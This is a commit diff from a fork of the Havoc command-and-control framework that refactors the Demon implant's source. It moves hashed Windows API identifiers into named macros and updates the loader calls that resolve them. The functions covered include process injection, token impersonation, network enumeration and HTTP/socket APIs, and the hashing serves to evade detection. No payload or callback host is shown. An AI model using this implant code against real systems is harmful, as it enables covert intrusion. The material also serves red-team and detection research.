michael.reber/Havoc
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

define all hashes on Defines.h

Browse Source
This commit is contained in:
S4ntiagoP
2023-02-28 14:20:10 -03:00
parent c2a81bde1f
commit 0e82433e98
5 changed files with 418 additions and 233 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.gitignore
-4
View File
@@ -5,10 +5,6 @@
Client/Build
**/cmake-build-debug/
# ignore binaries
**/bin/
**/Bin/
# dont commit your loot
Teamserver/data/loot/
payloads/Demon/Include/Common/Defines.h
+206 -18
View File
@@ -13,24 +13,212 @@
#endif
// Hashes for the dynamic winapi loading via a hashing algorithm
#define FuncHash_GetTokenInformation 881854923972837164
#define FuncHash_CreatePipe 8244700854143020775
#define FuncHash_ReadFile 7571513842702625
#define FuncHash_RevertToSelf 14100625964972061354
#define FuncHash_Sleep 210689975806
#define FuncHash_TerminateProcess 3268205303374481261
#define FuncHash_GetUserNameA 13544547492196232006
#define FuncHash_ExitProcess 13824059171100242846
#define FuncHash_RtlGetVersion 4893460183577242141
#define FuncHash_RtlCreateUserThread 1016696724611196162
#define FuncHash_ResumeThread 14100509000585325166
#define FuncHash_OpenThread 8245254994680133519
#define FuncHash_Thread32Next 14206118522476693985
#define FuncHash_Thread32First 7633309398982761034
#define FuncHash_VirtualProtectEx 5341311935265804842
#define FuncHash_LookupAccountSidA 3739427023317208365
#define FuncHash_InitializeProcThreadAttributeList 6595998938373999155
#define FuncHash_UpdateProcThreadAttribute 6332977549253614184
#define FuncHash_LdrGetProcedureAddress 0x2e5a99f6
#define FuncHash_LdrLoadDll 0x0307db23
#define FuncHash_RtlAllocateHeap 0xc0b381da
#define FuncHash_RtlReAllocateHeap 0xc0b381da
#define FuncHash_RtlFreeHeap 0x70ba71d7
#define FuncHash_RtlExitUserThread 0x8e492b88
#define FuncHash_RtlExitUserProcess 0x3aa1f0ef
#define FuncHash_RtlRandomEx 0x7c3439f5
#define FuncHash_RtlNtStatusToDosError 0x35abf270
#define FuncHash_RtlGetVersion 0x3ca3aa1d
#define FuncHash_RtlCreateTimerQueue 0xf78fb211
#define FuncHash_RtlCreateTimer 0xa5de7c4c
#define FuncHash_RtlDeleteTimerQueue 0x9561fe90
#define FuncHash_RtlCaptureContext 0x7733eed0
#define FuncHash_RtlAddVectoredExceptionHandler 0x554bafa9
#define FuncHash_RtlRemoveVectoredExceptionHandler 0x880c210e
#define FuncHash_CreateThread 0x7f08f451
#define FuncHash_NtClose 0x8b8e133d
#define FuncHash_NtCreateEvent 0xca58747d
#define FuncHash_NtSetEvent 0x4514bd95
#define FuncHash_VirtualProtectEx 0xd812922a
#define FuncHash_VirtualProtect 0x844ff18d
#define FuncHash_LocalAlloc 0x73cebc5b
#define FuncHash_LocalReAlloc 0xabad9db2
#define FuncHash_LocalFree 0xa66df372
#define FuncHash_CreateRemoteThread 0xaa30775d
#define FuncHash_CreateToolhelp32Snapshot 0x66851295
#define FuncHash_CreatePipe 0x9a8deee7
#define FuncHash_CreateProcessA 0xaeb52e19
#define FuncHash_CreateFileW 0xeb96c610
#define FuncHash_GetFullPathNameW 0x3524e9fd
#define FuncHash_GetFileSize 0x7891c520
#define FuncHash_CreateNamedPipeW 0x28fe1c03
#define FuncHash_ConvertFiberToThread 0x1f194e49
#define FuncHash_CreateFiberEx 0x2bac113e
#define FuncHash_ReadFile 0x71019921
#define FuncHash_VirtualAllocEx 0xf36e5ab4
#define FuncHash_WaitForSingleObjectEx 0x56bd0197
#define FuncHash_ResumeThread 0x74162a6e
#define FuncHash_OpenThread 0x806cb78f
#define FuncHash_Thread32Next 0x695209e1
#define FuncHash_Thread32First 0x93049a4a
#define FuncHash_GetComputerNameExA 0xd252a5f3
#define FuncHash_ExitProcess 0xb769339e
#define FuncHash_GetExitCodeProcess 0xe21026f9
#define FuncHash_GetExitCodeThread 0xb263c852
#define FuncHash_TerminateProcess 0x60af076d
#define FuncHash_GetTickCount 0x41ad16b9
#define FuncHash_ReadProcessMemory 0xb8932459
#define FuncHash_ConvertThreadToFiberEx 0xac22a286
#define FuncHash_SwitchToFiber 0xc2d09e02
#define FuncHash_DeleteFiber 0x1cd85cc0
#define FuncHash_GetThreadContext 0xeba2cfc2
#define FuncHash_SetThreadContext 0x7e20964e
#define FuncHash_AllocConsole 0xcddb7fc3
#define FuncHash_FreeConsole 0x8afb8c5a
#define FuncHash_GetConsoleWindow 0xe1db2410
#define FuncHash_GetStdHandle 0xf178843c
#define FuncHash_SetStdHandle 0x3ce0e4c8
#define FuncHash_WaitNamedPipeW 0x085741c4
#define FuncHash_PeekNamedPipe 0x94f08b9d
#define FuncHash_DisconnectNamedPipe 0x55668f42
#define FuncHash_WriteFile 0x663cecb0
#define FuncHash_ConnectNamedPipe 0xc003c602
#define FuncHash_GetCurrentDirectoryW 0x2ced73f4
#define FuncHash_GetFileAttributesW 0xcc9c6ce3
#define FuncHash_FindFirstFileW 0xae2636e5
#define FuncHash_FindNextFileW 0xf3b43c5c
#define FuncHash_FindClose 0xb4e7451c
#define FuncHash_FileTimeToSystemTime 0x1fb7928b
#define FuncHash_SystemTimeToTzSpecificLocalTime 0x99a3156a
#define FuncHash_RemoveDirectoryW 0x4192723f
#define FuncHash_DeleteFileW 0x1cd8872f
#define FuncHash_CreateDirectoryW 0x41fac005
#define FuncHash_CopyFileW 0xac2253d7
#define FuncHash_InitializeProcThreadAttributeList 0x5ca2ca33
#define FuncHash_UpdateProcThreadAttribute 0x09c91a68
#define FuncHash_SetCurrentDirectoryW 0xbec3a080
#define FuncHash_Wow64DisableWow64FsRedirection 0xd859b1d8
#define FuncHash_Wow64RevertWow64FsRedirection 0x72f47e1c
#define FuncHash_GetModuleHandleA 0x5a153f58
#define FuncHash_NtOpenProcess 0x5003c058
#define FuncHash_NtQueryInformationProcess 0xd034fc62
#define FuncHash_NtQuerySystemInformation 0xee4f73a8
#define FuncHash_NtAllocateVirtualMemory 0x6793c34c
#define FuncHash_NtQueueApcThread 0xd4612238
#define FuncHash_NtOpenThread 0xfb8a31d1
#define FuncHash_NtResumeThread 0x2c7b3d30
#define FuncHash_NtSuspendThread 0x50febd61
#define FuncHash_NtCreateEvent 0xca58747d
#define FuncHash_NtDuplicateObject 0x2388ee19
#define FuncHash_NtGetContextThread 0x9e0e1a44
#define FuncHash_NtSetContextThread 0x308be0d0
#define FuncHash_NtWaitForSingleObject 0x4c6dc63c
#define FuncHash_NtAlertResumeThread 0x482e8408
#define FuncHash_NtSignalAndWaitForSingleObject 0x7bdd15cd
#define FuncHash_NtTestAlert 0x7915b7df
#define FuncHash_NtCreateThreadEx 0xcb0c2130
#define FuncHash_NtOpenProcessToken 0x7bd07459
#define FuncHash_NtDuplicateToken 0x3000ecc3
#define FuncHash_NtProtectVirtualMemory 0x082962c8
#define FuncHash_NtTerminateThread 0xac3c9dc8
#define FuncHash_NtWriteVirtualMemory 0x95f3a792
#define FuncHash_NtContinue 0x780a612c
#define FuncHash_NtReadVirtualMemory 0xc24062e3
#define FuncHash_NtFreeVirtualMemory 0x471aa7e9
#define FuncHash_NtQueryVirtualMemory 0xe39d8e5d
#define FuncHash_NtQueryInformationToken 0x2ce5a244
#define FuncHash_NtQueryInformationThread 0xc91f149b
#define FuncHash_GetTokenInformation 881854923972837164
#define FuncHash_CreateProcessWithTokenW 0x94e76e4c
#define FuncHash_CreateProcessWithLogonW 0x823c224a
#define FuncHash_RevertToSelf 14100625964972061354
#define FuncHash_GetUserNameA 13544547492196232006
#define FuncHash_LogonUserA 0x609d56e4
#define FuncHash_LookupPrivilegeValueA 0xbbae6e84
#define FuncHash_LookupAccountSidA 3739427023317208365
#define FuncHash_OpenThreadToken 579177116578842096
#define FuncHash_OpenProcessToken 0xc57bd097
#define FuncHash_ImpersonateLoggedOnUser 0xa6ffd55a
#define FuncHash_AdjustTokenPrivileges 0xce4cd9cb
#define FuncHash_LookupPrivilegeNameA 0xe6176fe8
#define FuncHash_SystemFunction032 0xcccf3585
#define FuncHash_FreeSid 0x2174ce07
#define FuncHash_SetSecurityDescriptorSacl 0x4a8307ab
#define FuncHash_SetSecurityDescriptorDacl 0x4a7acdfc
#define FuncHash_InitializeSecurityDescriptor 0x70670cee
#define FuncHash_AddMandatoryAce 0x248cc186
#define FuncHash_InitializeAcl 0x62cac4c7
#define FuncHash_AllocateAndInitializeSid 0x57a4ccf
#define FuncHash_SetEntriesInAclW 0xe2d6b8e9
#define FuncHash_SetThreadToken 0x575b17ca
#define FuncHash_SafeArrayAccessData 2675336209888825647
#define FuncHash_SafeArrayUnaccessData 18329906161741280562
#define FuncHash_SafeArrayCreate 3571287155138900375
#define FuncHash_SafeArrayPutElement 2676058380407465830
#define FuncHash_SafeArrayCreateVector 17426458116918762890
#define FuncHash_SafeArrayDestroy 7172011678126394509
#define FuncHash_SysAllocString 3847978704220612774
#define FuncHash_CommandLineToArgvW 0x8d607276
#define FuncHash_vsnprintf 0xe61d840f
#define FuncHash_ShowWindow 8245429827274884638
#define FuncHash_GetSystemMetrics 0xa988c1a1
#define FuncHash_GetDC 0xd3d24ac
#define FuncHash_ReleaseDC 0xe43871cd
#define FuncHash_GetCurrentObject 0xd41e47df
#define FuncHash_GetObjectW 0x512b413
#define FuncHash_CreateCompatibleDC 0xa05cbae0
#define FuncHash_CreateDIBSection 0xfff5b73d
#define FuncHash_SelectObject 0x7cf4fd7c
#define FuncHash_BitBlt 0xa9804e46
#define FuncHash_DeleteObject 0xcc68186f
#define FuncHash_DeleteDC 0x9f3bef5f
#define FuncHash_SetProcessValidCallTargets 0xbb6970d6
#define FuncHash_WinHttpOpen 0x5e4f39e5
#define FuncHash_WinHttpConnect 0x7242c17d
#define FuncHash_WinHttpOpenRequest 0xeab7b9ce
#define FuncHash_WinHttpSetOption 0xa18b94f8
#define FuncHash_WinHttpCloseHandle 0x36220cd5
#define FuncHash_WinHttpSendRequest 0xb183faa6
#define FuncHash_WinHttpAddRequestHeaders 0xed7fcb41
#define FuncHash_WinHttpReceiveResponse 0x146c4925
#define FuncHash_WinHttpWebSocketCompleteUpgrade 0x58929db
#define FuncHash_WinHttpQueryDataAvailable 0x34cb8684
#define FuncHash_WinHttpReadData 0x7195e4e9
#define FuncHash_WinHttpQueryHeaders 0x389cefa5
#define FuncHash_CLRCreateInstance 10918823944048432655
#define FuncHash_GetAdaptersInfo 0xbc950fc5
#define FuncHash_NetLocalGroupEnum 0x2c3fa6b9
#define FuncHash_NetGroupEnum 0xb278fc6e
#define FuncHash_NetUserEnum 0xe84c1c20
#define FuncHash_NetWkstaUserEnum 0x3f45a8a
#define FuncHash_NetSessionEnum 0x80edcd45
#define FuncHash_NetShareEnum 0xb0461db4
#define FuncHash_NetApiBufferFree 0x83e6be2
#define FuncHash_WSAStartup 0x6128c683
#define FuncHash_WSACleanup 0x7f1aab78
#define FuncHash_WSASocketA 0x559f159a
#define FuncHash_ioctlsocket 0x6dcd609
#define FuncHash_bind 0x7c9499e2
#define FuncHash_listen 0xb794014
#define FuncHash_accept 0xf15ae9b5
#define FuncHash_closesocket 0x494cb104
#define FuncHash_recv 0x7c9d4d95
#define FuncHash_send 0x7c9ddb4f
#define FuncHash_connect 0xd3764dcf
#define FuncHash_DnsQuery_A 0xeb04a380
//#define FuncHash_GetTokenInformation 881854923972837164
//#define FuncHash_CreatePipe 8244700854143020775
//#define FuncHash_ReadFile 7571513842702625
//#define FuncHash_RevertToSelf 14100625964972061354
//#define FuncHash_Sleep 210689975806
//#define FuncHash_TerminateProcess 3268205303374481261
//#define FuncHash_GetUserNameA 13544547492196232006
//#define FuncHash_ExitProcess 13824059171100242846
//#define FuncHash_RtlGetVersion 4893460183577242141
//#define FuncHash_RtlCreateUserThread 1016696724611196162
//#define FuncHash_ResumeThread 14100509000585325166
//#define FuncHash_OpenThread 8245254994680133519
//#define FuncHash_Thread32Next 14206118522476693985
//#define FuncHash_Thread32First 7633309398982761034
//#define FuncHash_VirtualProtectEx 5341311935265804842
//#define FuncHash_LookupAccountSidA 3739427023317208365
//#define FuncHash_InitializeProcThreadAttributeList 6595998938373999155
//#define FuncHash_UpdateProcThreadAttribute 6332977549253614184
// Beacon API
#define COFFAPI_BEACONDATAPARSER 0xe2494ba2
payloads/Demon/Source/Demon.c
+208 -208
View File
@@ -268,88 +268,88 @@ VOID DemonInit( VOID )
if ( ( ! Instance.Modules.Kernel32 ) || ( Instance.Modules.Ntdll ) )
{
// Ntdll
Instance.Win32.LdrGetProcedureAddress = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2e5a99f6 );
Instance.Win32.LdrLoadDll = LdrFunctionAddr( Instance.Modules.Ntdll, 0x307db23 );
Instance.Win32.RtlAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc0b381da );
Instance.Win32.RtlReAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc0b381da );
Instance.Win32.RtlFreeHeap = LdrFunctionAddr( Instance.Modules.Ntdll, 0x70ba71d7 );
Instance.Win32.RtlExitUserThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x8e492b88 );
Instance.Win32.RtlExitUserProcess = LdrFunctionAddr( Instance.Modules.Ntdll, 0x3aa1f0ef );
Instance.Win32.RtlRandomEx = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7c3439f5 );
Instance.Win32.RtlNtStatusToDosError = LdrFunctionAddr( Instance.Modules.Ntdll, 0x35abf270 );
Instance.Win32.RtlGetVersion = LdrFunctionAddr( Instance.Modules.Ntdll, 0x3ca3aa1d );
Instance.Win32.RtlCreateTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, 0xf78fb211 );
Instance.Win32.RtlCreateTimer = LdrFunctionAddr( Instance.Modules.Ntdll, 0xa5de7c4c );
Instance.Win32.RtlDeleteTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, 0x9561fe90 );
Instance.Win32.RtlCaptureContext = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7733eed0 );
Instance.Win32.RtlAddVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, 0x554bafa9 );
Instance.Win32.RtlRemoveVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, 0x880c210e );
Instance.Win32.NtClose = LdrFunctionAddr( Instance.Modules.Ntdll, 0x8b8e133d );
Instance.Win32.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, 0xca58747d );
Instance.Win32.NtSetEvent = LdrFunctionAddr( Instance.Modules.Ntdll, 0x4514bd95 );
Instance.Win32.LdrGetProcedureAddress = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_LdrGetProcedureAddress );
Instance.Win32.LdrLoadDll = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_LdrLoadDll );
Instance.Win32.RtlAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlAllocateHeap );
Instance.Win32.RtlReAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlReAllocateHeap );
Instance.Win32.RtlFreeHeap = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlFreeHeap );
Instance.Win32.RtlExitUserThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlExitUserThread );
Instance.Win32.RtlExitUserProcess = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlExitUserProcess );
Instance.Win32.RtlRandomEx = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlRandomEx );
Instance.Win32.RtlNtStatusToDosError = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlNtStatusToDosError );
Instance.Win32.RtlGetVersion = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlGetVersion );
Instance.Win32.RtlCreateTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlCreateTimerQueue );
Instance.Win32.RtlCreateTimer = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlCreateTimer );
Instance.Win32.RtlDeleteTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlDeleteTimerQueue );
Instance.Win32.RtlCaptureContext = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlCaptureContext );
Instance.Win32.RtlAddVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlAddVectoredExceptionHandler );
Instance.Win32.RtlRemoveVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlRemoveVectoredExceptionHandler );
Instance.Win32.NtClose = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtClose );
Instance.Win32.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtCreateEvent );
Instance.Win32.NtSetEvent = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSetEvent );
// Kernel32
Instance.Win32.VirtualProtectEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0xd812922a );
Instance.Win32.VirtualProtect = LdrFunctionAddr( Instance.Modules.Kernel32, 0x844ff18d );
Instance.Win32.LocalAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, 0x73cebc5b );
Instance.Win32.LocalReAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, 0xabad9db2 );
Instance.Win32.LocalFree = LdrFunctionAddr( Instance.Modules.Kernel32, 0xa66df372 );
Instance.Win32.CreateRemoteThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0xaa30775d );
Instance.Win32.CreateToolhelp32Snapshot = LdrFunctionAddr( Instance.Modules.Kernel32, 0x66851295 );
Instance.Win32.CreatePipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0x9a8deee7 );
Instance.Win32.CreateProcessA = LdrFunctionAddr( Instance.Modules.Kernel32, 0xaeb52e19 );
Instance.Win32.CreateFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xeb96c610 );
Instance.Win32.GetFullPathNameW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x3524e9fd );
Instance.Win32.GetFileSize = LdrFunctionAddr( Instance.Modules.Kernel32, 0x7891c520 );
Instance.Win32.CreateNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x28fe1c03 );
Instance.Win32.ConvertFiberToThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1f194e49 );
Instance.Win32.CreateFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0x2bac113e );
Instance.Win32.ReadFile = LdrFunctionAddr( Instance.Modules.Kernel32, 0x71019921 );
Instance.Win32.VirtualAllocEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0xf36e5ab4 );
Instance.Win32.WaitForSingleObjectEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0x56bd0197 );
Instance.Win32.ResumeThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0x74162a6e );
Instance.Win32.OpenThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0x806cb78f );
Instance.Win32.Thread32Next = LdrFunctionAddr( Instance.Modules.Kernel32, 0x695209e1 );
Instance.Win32.Thread32First = LdrFunctionAddr( Instance.Modules.Kernel32, 0x93049a4a );
Instance.Win32.GetComputerNameExA = LdrFunctionAddr( Instance.Modules.Kernel32, 0xd252a5f3 );
Instance.Win32.ExitProcess = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb769339e );
Instance.Win32.GetExitCodeProcess = LdrFunctionAddr( Instance.Modules.Kernel32, 0xe21026f9 );
Instance.Win32.GetExitCodeThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb263c852 );
Instance.Win32.TerminateProcess = LdrFunctionAddr( Instance.Modules.Kernel32, 0x60af076d );
Instance.Win32.GetTickCount = LdrFunctionAddr( Instance.Modules.Kernel32, 0x41ad16b9 );
Instance.Win32.ReadProcessMemory = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb8932459 );
Instance.Win32.ConvertThreadToFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0xac22a286 );
Instance.Win32.SwitchToFiber = LdrFunctionAddr( Instance.Modules.Kernel32, 0xc2d09e02 );
Instance.Win32.DeleteFiber = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1cd85cc0 );
Instance.Win32.GetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, 0xeba2cfc2 );
Instance.Win32.SetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, 0x7e20964e );
Instance.Win32.AllocConsole = LdrFunctionAddr( Instance.Modules.Kernel32, 0xcddb7fc3 );
Instance.Win32.FreeConsole = LdrFunctionAddr( Instance.Modules.Kernel32, 0x8afb8c5a );
Instance.Win32.GetConsoleWindow = LdrFunctionAddr( Instance.Modules.Kernel32, 0xe1db2410 );
Instance.Win32.GetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, 0xf178843c );
Instance.Win32.SetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, 0x3ce0e4c8 );
Instance.Win32.WaitNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x85741c4 );
Instance.Win32.PeekNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0x94f08b9d );
Instance.Win32.DisconnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0x55668f42 );
Instance.Win32.WriteFile = LdrFunctionAddr( Instance.Modules.Kernel32, 0x663cecb0 );
Instance.Win32.ConnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0xc003c602 );
Instance.Win32.GetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x2ced73f4 );
Instance.Win32.GetFileAttributesW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xcc9c6ce3 );
Instance.Win32.FindFirstFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xae2636e5 );
Instance.Win32.FindNextFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xf3b43c5c );
Instance.Win32.FindClose = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb4e7451c );
Instance.Win32.FileTimeToSystemTime = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1fb7928b );
Instance.Win32.SystemTimeToTzSpecificLocalTime = LdrFunctionAddr( Instance.Modules.Kernel32, 0x99a3156a );
Instance.Win32.RemoveDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x4192723f );
Instance.Win32.DeleteFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1cd8872f );
Instance.Win32.CreateDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x41fac005 );
Instance.Win32.CopyFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xac2253d7 );
Instance.Win32.InitializeProcThreadAttributeList = LdrFunctionAddr( Instance.Modules.Kernel32, 0x5ca2ca33 );
Instance.Win32.UpdateProcThreadAttribute = LdrFunctionAddr( Instance.Modules.Kernel32, 0x9c91a68 );
Instance.Win32.SetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xbec3a080 );
Instance.Win32.Wow64DisableWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, 0xd859b1d8 );
Instance.Win32.Wow64RevertWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, 0x72f47e1c );
Instance.Win32.GetModuleHandleA = LdrFunctionAddr( Instance.Modules.Kernel32, 0x5a153f58 );
Instance.Win32.VirtualProtectEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_VirtualProtectEx );
Instance.Win32.VirtualProtect = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_VirtualProtect );
Instance.Win32.LocalAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_LocalAlloc );
Instance.Win32.LocalReAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_LocalReAlloc );
Instance.Win32.LocalFree = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_LocalFree );
Instance.Win32.CreateRemoteThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateRemoteThread );
Instance.Win32.CreateToolhelp32Snapshot = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateToolhelp32Snapshot );
Instance.Win32.CreatePipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreatePipe );
Instance.Win32.CreateProcessA = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateProcessA );
Instance.Win32.CreateFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateFileW );
Instance.Win32.GetFullPathNameW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetFullPathNameW );
Instance.Win32.GetFileSize = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetFileSize );
Instance.Win32.CreateNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateNamedPipeW );
Instance.Win32.ConvertFiberToThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ConvertFiberToThread );
Instance.Win32.CreateFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateFiberEx );
Instance.Win32.ReadFile = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ReadFile );
Instance.Win32.VirtualAllocEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_VirtualAllocEx );
Instance.Win32.WaitForSingleObjectEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_WaitForSingleObjectEx );
Instance.Win32.ResumeThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ResumeThread );
Instance.Win32.OpenThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_OpenThread );
Instance.Win32.Thread32Next = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Thread32Next );
Instance.Win32.Thread32First = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Thread32First );
Instance.Win32.GetComputerNameExA = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetComputerNameExA );
Instance.Win32.ExitProcess = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ExitProcess );
Instance.Win32.GetExitCodeProcess = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetExitCodeProcess );
Instance.Win32.GetExitCodeThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetExitCodeThread );
Instance.Win32.TerminateProcess = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_TerminateProcess );
Instance.Win32.GetTickCount = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetTickCount );
Instance.Win32.ReadProcessMemory = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ReadProcessMemory );
Instance.Win32.ConvertThreadToFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ConvertThreadToFiberEx );
Instance.Win32.SwitchToFiber = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SwitchToFiber );
Instance.Win32.DeleteFiber = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_DeleteFiber );
Instance.Win32.GetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetThreadContext );
Instance.Win32.SetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SetThreadContext );
Instance.Win32.AllocConsole = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_AllocConsole );
Instance.Win32.FreeConsole = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FreeConsole );
Instance.Win32.GetConsoleWindow = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetConsoleWindow );
Instance.Win32.GetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetStdHandle );
Instance.Win32.SetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SetStdHandle );
Instance.Win32.WaitNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_WaitNamedPipeW );
Instance.Win32.PeekNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_PeekNamedPipe );
Instance.Win32.DisconnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_DisconnectNamedPipe );
Instance.Win32.WriteFile = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_WriteFile );
Instance.Win32.ConnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ConnectNamedPipe );
Instance.Win32.GetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetCurrentDirectoryW );
Instance.Win32.GetFileAttributesW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetFileAttributesW );
Instance.Win32.FindFirstFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FindFirstFileW );
Instance.Win32.FindNextFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FindNextFileW );
Instance.Win32.FindClose = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FindClose );
Instance.Win32.FileTimeToSystemTime = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FileTimeToSystemTime );
Instance.Win32.SystemTimeToTzSpecificLocalTime = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SystemTimeToTzSpecificLocalTime );
Instance.Win32.RemoveDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_RemoveDirectoryW );
Instance.Win32.DeleteFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_DeleteFileW );
Instance.Win32.CreateDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateDirectoryW );
Instance.Win32.CopyFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CopyFileW );
